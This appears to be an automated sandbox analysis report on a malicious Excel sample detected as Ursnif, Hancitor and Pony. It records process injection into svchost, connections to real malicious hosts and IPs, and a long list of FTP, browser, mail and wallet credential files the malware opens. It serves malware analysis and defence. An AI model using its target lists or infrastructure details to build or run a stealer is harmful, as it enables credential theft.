          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpCode function: 13_2_00F65D8B push dword ptr fs:[00000030h]13_2_00F65D8B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_02441390 GetProcessHeap,RtlAllocateHeap,6_2_02441390
          Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_1000B836 SetUnhandledExceptionFilter,RevertToSelf,6_2_1000B836
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0BC09FDC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0BC09FDC
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpCode function: 13_2_004021A7 InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,13_2_004021A7
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory protected: page execute read | page execute and read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.225.191.113 80Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.218.231.226 80Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.206.163.136 187Jump to behavior
          Allocates memory in foreign processesShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 2440000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2440000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BC00000 value starts with: 4D5AJump to behavior
          Writes to foreign memory regionsShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2440000Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 22F1008Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_1000B56A lstrcmpiA,LogonUserA,lstrlenA,LCMapStringA,LogonUserA,LogonUserA,LoadUserProfileA,ImpersonateLoggedOnUser,RevertToSelf,UnloadUserProfile,CloseHandle,6_2_1000B56A
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /KJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exeJump to behavior
          Source: Yara matchFile source: tr_0.xls, type: SAMPLE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_10002EF5 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,6_2_10002EF5
          Source: svchost.exe, 00000006.00000002.708598173.00000000030A0000.00000002.00000001.sdmp, BN6D10.tmp, 0000000D.00000002.707103316.0000000001730000.00000002.00000001.sdmpBinary or memory string: Program ManagerWv{
          Source: svchost.exe, 00000006.00000002.708598173.00000000030A0000.00000002.00000001.sdmp, BN6D10.tmp, 0000000D.00000002.707103316.0000000001730000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: svchost.exe, 00000006.00000002.708598173.00000000030A0000.00000002.00000001.sdmp, BN6D10.tmp, 0000000D.00000002.707103316.0000000001730000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,6_2_100044F3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetVersionExA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LocalAlloc,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,12_2_0BC02741
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpCode function: LdrInitializeThunk,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,13_2_00401676
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpCode function: 13_2_0040177C GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,13_2_0040177C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_1000B763 OleInitialize,GetUserNameA,6_2_1000B763
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_02441580 GetVersion,wsprintfA,wsprintfA,6_2_02441580

          Stealing of Sensitive Information:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549333620.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549457976.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549162557.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549367546.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549299177.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549421669.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: BN6D10.tmp PID: 1940, type: MEMORY
          Yara detected PonyShow sources
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5128, type: MEMORY
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)Show sources
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
          Tries to harvest and steal ftp login credentialsShow sources
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\CuteFTP\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\History.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\SmartFTP\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\FileZilla\sitemanager.xmlJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\History.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbarJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\CuteFTP\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\FlashFXP\3\Quick.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xmlJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xmlJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbarJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.iniJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\CuteFTP\sm.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xmlJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\FlashFXP\3\Sites.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbarJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbarJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 9\QCToolbarJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\FileZilla\filezilla.xmlJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files (x86)\CuteFTP\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\wcx_ftp.iniJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\GHISLER\wcx_ftp.iniJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\FileZilla\recentservers.xmlJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\CuteFTP\sm.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xmlJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\FlashFXP\4\Sites.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\FlashFXP\4\Quick.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbarJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files (x86)\CuteFTP\sm.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbarJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.iniJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\FlashFXP\3\History.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\CuteFTP\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\FlashFXP\4\History.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\wcx_ftp.iniJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\ProgramData\SmartFTP\Jump to behavior
          Tries to steal Crypto Currency WalletsShow sources
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\file__0.localstorageJump to behavior
          Tries to steal Mail credentials (via file access)Show sources
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet SettingsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet SettingsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
          Tries to steal Mail credentials (via file registry)Show sources
          Source: C:\Windows\SysWOW64\svchost.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword6_2_1000A34F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword6_2_1000A34F

          Remote Access Functionality:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549333620.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549457976.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549162557.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549367546.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549299177.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549421669.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: BN6D10.tmp PID: 1940, type: MEMORY
          Yara detected HancitorShow sources
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4912, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5128, type: MEMORY
          Yara detected PonyShow sources
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5128, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1Windows Management Instrumentation2Valid Accounts1Valid Accounts1Software Packing21Credential Dumping2System Time Discovery1Remote File Copy14Data from Local System3Data Encrypted1Remote File Copy14Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Replication Through Removable MediaScripting1Application Shimming1Access Token Manipulation11Disabling Security Tools11Input Capture1Account Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumStandard Cryptographic Protocol22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          External Remote ServicesExecution through API12Accessibility FeaturesProcess Injection412Deobfuscate/Decode Files or Information1Credentials in Registry2Security Software Discovery141Windows Remote ManagementInput Capture1Automated ExfiltrationStandard Non-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Drive-by CompromiseExploitation for Client Execution4System FirmwareApplication Shimming1Scripting1Credentials in FilesFile and Directory Discovery3Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol15SIM Card SwapPremium SMS Toll Fraud
          Exploit Public-Facing ApplicationGraphical User Interface1Shortcut ModificationFile System Permissions WeaknessObfuscated Files or Information2Account ManipulationSystem Information Discovery45Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceMasquerading11Brute ForceNetwork Share Discovery1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
          Spearphishing AttachmentScriptingPath InterceptionScheduled TaskValid Accounts1Two-Factor Authentication InterceptionVirtualization/Sandbox Evasion13Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionVirtualization/Sandbox Evasion13Bash HistoryProcess Discovery3Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessAccess Token Manipulation11Input PromptSystem Owner/User Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
          Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationProcess Injection412KeychainRemote System Discovery1Taint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact
          Hardware AdditionsExecution through APIFile System Permissions WeaknessValid AccountsDLL Side-Loading1Private KeysSecurity Software DiscoveryReplication Through Removable MediaVideo CaptureStandard Application Layer ProtocolCommunication Through Removable MediaDisk Structure Wipe

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1179994 Sample: tr_0.xls Startdate: 14/07/2020 Architecture: WINDOWS Score: 100 50 low.explik.at 2->50 84 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->84 86 Multi AV Scanner detection for domain / URL 2->86 88 Malicious sample detected (through community Yara rule) 2->88 90 13 other signatures 2->90 10 EXCEL.EXE 70 67 2->10         started        15 iexplore.exe 2->15         started        17 iexplore.exe 2->17         started        signatures3 process4 dnsIp5 60 mac-rail.com 5.101.51.247, 49704, 80 SELECTELRU Russian Federation 10->60 44 C:\Users\user\Documents\dDdoiBj.ocx, PE32 10->44 dropped 46 C:\Users\user\AppData\Local\...\434[1].dll, PE32 10->46 dropped 98 Document exploit detected (creates forbidden files) 10->98 100 Document exploit detected (process start blacklist hit) 10->100 102 Document exploit detected (UrlDownloadToFile) 10->102 19 regsvr32.exe 10->19         started        22 iexplore.exe 15->22         started        25 iexplore.exe 17->25         started        file6 signatures7 process8 dnsIp9 92 Writes to foreign memory regions 19->92 94 Allocates memory in foreign processes 19->94 96 Injects a PE file into a foreign processes 19->96 27 svchost.exe 2 13 19->27         started        32 WerFault.exe 25 10 19->32         started        54 low.explik.at 8.208.80.226, 49714, 49715, 49717 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 22->54 56 gaw.explik.at 22->56 58 gaw.explik.at 25->58 signatures10 process11 dnsIp12 62 overnightfile.com 91.218.231.226, 49706, 49708, 49711 IHCRUInternet-HostingLtdMoscowRussiaRU Russian Federation 27->62 64 accesoeducativo.com 185.206.163.136, 443, 49707, 49709 AS-HOSTINGERLT Germany 27->64 66 3 other IPs or domains 27->66 48 C:\Users\user\AppData\Local\Temp\BN6D10.tmp, PE32 27->48 dropped 104 System process connects to network (likely due to code injection or exploit) 27->104 106 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 27->106 108 Tries to steal Mail credentials (via file registry) 27->108 110 3 other signatures 27->110 34 BN6D10.tmp 27->34         started        37 svchost.exe 12 27->37         started        40 cmd.exe 1 27->40         started        file13 signatures14 process15 dnsIp16 68 Antivirus detection for dropped file 34->68 70 Multi AV Scanner detection for dropped file 34->70 72 Detected unpacking (changes PE section rights) 34->72 80 5 other signatures 34->80 52 overnightfile.com 37->52 74 System process connects to network (likely due to code injection or exploit) 37->74 76 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 37->76 78 Tries to steal Mail credentials (via file access) 37->78 82 3 other signatures 37->82 42 conhost.exe 40->42         started        signatures17 process18

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          tr_0.xls20%VirustotalBrowse
          tr_0.xls17%ReversingLabsDocument-Word.Trojan.Kryptik

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll100%AviraTR/AD.ZDlder.phzid
          C:\Users\user\AppData\Local\Temp\BN6D10.tmp100%AviraTR/Crypt.Agent.sxpge
          C:\Users\user\Documents\dDdoiBj.ocx100%AviraTR/AD.ZDlder.phzid
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\BN6D10.tmp100%Joe Sandbox ML
          C:\Users\user\Documents\dDdoiBj.ocx100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll48%VirustotalBrowse
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll16%MetadefenderBrowse
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll32%ReversingLabsWin32.Trojan.Ejgrzty
          C:\Users\user\AppData\Local\Temp\BN6D10.tmp42%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\BN6D10.tmp14%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\BN6D10.tmp55%ReversingLabsWin32.Trojan.Kryptik
          C:\Users\user\Documents\dDdoiBj.ocx48%VirustotalBrowse
          C:\Users\user\Documents\dDdoiBj.ocx16%MetadefenderBrowse
          C:\Users\user\Documents\dDdoiBj.ocx32%ReversingLabsWin32.Trojan.Ejgrzty

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          13.0.BN6D10.tmp.400000.0.unpack100%AviraTR/Crypt.Agent.sxpgeDownload File
          13.2.BN6D10.tmp.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.3.svchost.exe.5c00000.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          6.3.svchost.exe.5800000.0.unpack100%AviraTR/Kryptik.avp.8Download File
          13.3.BN6D10.tmp.d80000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          6.2.svchost.exe.2440000.0.unpack100%AviraTR/Dropper.GenDownload File
          13.2.BN6D10.tmp.ef0000.1.unpack100%AviraHEUR/AGEN.1108168Download File
